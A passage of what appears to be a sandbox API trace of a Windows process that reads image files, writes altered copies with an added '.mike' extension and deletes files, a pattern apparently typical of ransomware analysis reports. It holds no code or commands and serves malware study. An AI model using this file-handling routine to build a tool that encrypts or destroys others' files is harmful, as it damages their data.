lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", lpFilePart=0x0) returned 0x40 [0100.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0100.879] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0100.879] GetFileType (hFile=0x288) returned 0x1 [0100.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0100.879] GetFileType (hFile=0x288) returned 0x1 [0100.879] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0100.880] ReadFile (in: hFile=0x288, lpBuffer=0x223242c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x223242c*, lpNumberOfBytesRead=0x2af110*=0xba3, lpOverlapped=0x0) returned 1 [0100.881] CloseHandle (hObject=0x288) returned 1 [0100.881] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike", lpFilePart=0x0) returned 0x45 [0100.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0100.881] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0100.881] GetFileType (hFile=0x288) returned 0x1 [0100.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0100.882] GetFileType (hFile=0x288) returned 0x1 [0100.882] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0100.882] WriteFile (in: hFile=0x288, lpBuffer=0x22398d0*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x22398d0*, lpNumberOfBytesWritten=0x2af104*=0xbb0, lpOverlapped=0x0) returned 1 [0100.882] CloseHandle (hObject=0x288) returned 1 [0100.882] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike", lpFilePart=0x0) returned 0x45 [0100.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0100.882] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.jpg.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0100.882] GetFileType (hFile=0x288) returned 0x1 [0100.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0100.882] GetFileType (hFile=0x288) returned 0x1 [0100.883] WriteFile (in: hFile=0x288, lpBuffer=0x223caec*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x223caec*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0100.883] CloseHandle (hObject=0x288) returned 1 [0100.884] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", lpFilePart=0x0) returned 0x40 [0100.884] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike", lpFilePart=0x0) returned 0x45 [0100.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0100.884] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56bd400, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x56bd400, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x56bd400, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xdd0)) returned 1 [0100.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0100.884] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", lpFilePart=0x0) returned 0x40 [0100.884] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike", lpFilePart=0x0) returned 0x45 [0100.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.884] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x223e1d0 | out: lpFileInformation=0x223e1d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56bd400, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x56bd400, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x56bd400, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xdd0)) returned 1 [0100.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.884] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", lpFilePart=0x0) returned 0x40 [0100.884] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", dwFileAttributes=0x80) returned 0 [0100.885] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", lpFilePart=0x0) returned 0x40 [0100.885] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike", lpFilePart=0x0) returned 0x45 [0100.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b8) returned 1 [0100.885] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af134 | out: lpFileInformation=0x2af134*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56bd400, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x56bd400, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x56bd400, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xdd0)) returned 1 [0100.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0b4) returned 1 [0100.886] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", lpFilePart=0x0) returned 0x40 [0100.886] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike", lpFilePart=0x0) returned 0x45 [0100.886] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.jpg.mike")) returned 1 [0100.887] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", lpFilePart=0x0) returned 0x40 [0100.887] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", lpFilePart=0x0) returned 0x40 [0100.887] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", lpFilePart=0x0) returned 0x40 [0100.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0100.887] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0100.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adfa0) returned 1 [0100.889] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", nBufferLength=0x105, lpBuffer=0x2aeba8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", lpFilePart=0x0) returned 0x40 [0100.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af09c) returned 1 [0100.889] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0100.889] GetFileType (hFile=0x288) returned 0x1 [0100.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0100.889] GetFileType (hFile=0x288) returned 0x1 [0100.889] CloseHandle (hObject=0x288) returned 1 [0100.889] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", lpFilePart=0x0) returned 0x40 [0100.889] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", lpFilePart=0x0) returned 0x40 [0100.889] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0100.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0100.889] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0100.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0100.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.890] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.png"), fInfoLevelId=0x0, lpFileInformation=0x2240838 | out: lpFileInformation=0x2240838*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828ce928, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828ce928, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x898f4b97, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x3a1c)) returned 1 [0100.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.890] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", lpFilePart=0x0) returned 0x40 [0100.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.890] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.png"), fInfoLevelId=0x0, lpFileInformation=0x2240b38 | out: lpFileInformation=0x2240b38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828ce928, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828ce928, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x898f4b97, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x3a1c)) returned 1 [0100.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.890] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", lpFilePart=0x0) returned 0x40 [0100.890] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", lpFilePart=0x0) returned 0x45 [0100.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0100.890] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0100.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0100.890] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", lpFilePart=0x0) returned 0x40 [0100.890] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", lpFilePart=0x0) returned 0x40 [0100.891] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", lpFilePart=0x0) returned 0x40 [0100.891] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", lpFilePart=0x0) returned 0x45 [0100.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0100.891] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0100.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0100.891] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", lpFilePart=0x0) returned 0x45 [0100.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0100.891] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0100.891] GetFileType (hFile=0x288) returned 0x1 [0100.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0100.891] GetFileType (hFile=0x288) returned 0x1 [0100.891] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0100.891] WriteFile (in: hFile=0x288, lpBuffer=0x22418e8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x22418e8*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0100.892] CloseHandle (hObject=0x288) returned 1 [0100.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0100.892] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.png"), fInfoLevelId=0x0, lpFileInformation=0x2241418 | out: lpFileInformation=0x2241418*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828ce928, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828ce928, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x898f4b97, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x3a1c)) returned 1 [0100.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0100.893] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", lpFilePart=0x0) returned 0x40 [0100.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0100.893] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0100.893] GetFileType (hFile=0x288) returned 0x1 [0100.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0100.893] GetFileType (hFile=0x288) returned 0x1 [0100.893] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0100.893] ReadFile (in: hFile=0x288, lpBuffer=0x2242a04, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x2242a04*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0100.895] CloseHandle (hObject=0x288) returned 1 [0100.896] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", lpFilePart=0x0) returned 0x45 [0100.896] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0100.896] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0100.896] GetFileType (hFile=0x288) returned 0x1 [0100.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0100.896] GetFileType (hFile=0x288) returned 0x1 [0100.896] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0100.896] WriteFile (in: hFile=0x288, lpBuffer=0x224cf6c*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x224cf6c*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0100.897] CloseHandle (hObject=0x288) returned 1 [0100.897] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", lpFilePart=0x0) returned 0x40 [0100.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0100.897] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0100.897] GetFileType (hFile=0x288) returned 0x1 [0100.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0100.897] GetFileType (hFile=0x288) returned 0x1 [0100.897] SetFilePointer (in: hFile=0x288, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x2800 [0100.897] ReadFile (in: hFile=0x288, lpBuffer=0x224f9ac, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x224f9ac*, lpNumberOfBytesRead=0x2af110*=0x121c, lpOverlapped=0x0) returned 1 [0100.897] CloseHandle (hObject=0x288) returned 1 [0100.898] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", lpFilePart=0x0) returned 0x45 [0100.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0100.898] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0100.898] GetFileType (hFile=0x288) returned 0x1 [0100.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0100.898] GetFileType (hFile=0x288) returned 0x1 [0100.898] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x2a20 [0100.898] WriteFile (in: hFile=0x288, lpBuffer=0x225819c*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x225819c*, lpNumberOfBytesWritten=0x2af124*=0x1220, lpOverlapped=0x0) returned 1 [0100.898] CloseHandle (hObject=0x288) returned 1 [0100.898] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", lpFilePart=0x0) returned 0x45 [0100.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0100.899] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.png.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0100.899] GetFileType (hFile=0x288) returned 0x1 [0100.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0100.899] GetFileType (hFile=0x288) returned 0x1 [0100.900] WriteFile (in: hFile=0x288, lpBuffer=0x225b6fc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x225b6fc*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0100.900] CloseHandle (hObject=0x288) returned 1 [0100.900] GetFullPathNameW (in: 